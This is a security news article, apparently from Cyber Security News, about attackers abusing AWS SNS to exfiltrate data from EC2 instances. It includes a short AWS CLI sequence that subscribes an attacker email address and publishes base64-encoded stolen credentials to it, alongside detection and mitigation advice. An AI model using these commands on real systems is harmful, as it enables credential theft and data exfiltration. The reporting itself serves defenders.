Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns.This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and [network monitoring](https://cybersecuritynews.com/cisa-releases-guidance-for-network-monitoring/).The attacks leverage legitimate AWS functionality to create SNS topics, subscribe external email addresses, and publish sensitive data through API calls that appear as normal AWS service usage.This technique effectively bypasses security groups, network ACLs, and other traditional network-based protections because all communication occurs within trusted AWS infrastructure.Analysts at Elastic Security Labs [identified](https://www.elastic.co/security-labs/aws-sns-abuse) that adversaries with access to EC2 instances can exploit attached IAM roles that have SNS permissions to establish exfiltration channels.Their research demonstrated how attackers can use native AWS CLI commands to create topics and subscribe external email addresses that receive the stolen data.The exfiltration technique is particularly concerning because it leaves minimal forensic evidence and blends with legitimate traffic.Organizations with permissive IAM policies or monitoring gaps may not detect this activity until after sensitive data has been compromised.The technical implementation of this attack is straightforward and requires only basic AWS CLI knowledge.After gaining access to an EC2 instance, attackers can execute a series of commands to establish the exfiltration channel:- # Create SNS topic and capture its ARN TOPIC_ARN=$(aws sns create-topic –name ‘whitebox-sns-topic’ –query ‘TopicArn’ –output text) # Subscribe external email to the topic aws sns subscribe –topic-arn ‘$TOPIC_ARN’ –protocol email –notification-endpoint ‘adversary@protonmail.com’ # Base64 encode stolen credentials and publish to topic BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt) aws sns publish –topic-arn ‘$TOPIC_ARN’ –message ‘$BASE64_CONTENT’ –subject ‘Encoded Credentials from EC2’.webp) Workflow for data exfiltration via AWS SNS (Source — Elastic)Detection efforts should focus on CloudTrail logs for unusual SNS API calls, particularly CreateTopic, Subscribe, and Publish actions from EC2 instance roles.Elastic Security Labs provided hunting queries that identify anomalous SNS activity by monitoring for rare user identities creating topics or subscribing with [email](https://cybersecuritynews.com/email-security-gateways/) protocols.Security teams are advised to implement strict IAM policies following the principle of least privilege and enable comprehensive logging of SNS activities to [mitigate](https://cybersecuritynews.com/ways-to-mitigate-phishing-attacks-a-detailed-guide/) this emerging threat vector.******Are you from SOC/DFIR Teams? — Analyse Malware Incidents & get live Access with ANY.RUN -> [Start Now for Free](https://any.run/demo?utm_source=csn&utm_medium=article&utm_campaign=ti_feeds&utm_content=demo&utm_term=110325).******The post [AWS SNS Abused To Exfiltrate Data -& Phishing Attack](https://cybersecuritynews.com/aws-sns-abused/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
Related Tags:
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 51 – Information
TA0010 – Exfiltration
Blog: Cybersecurity News
Phishing
Associated Indicators:
null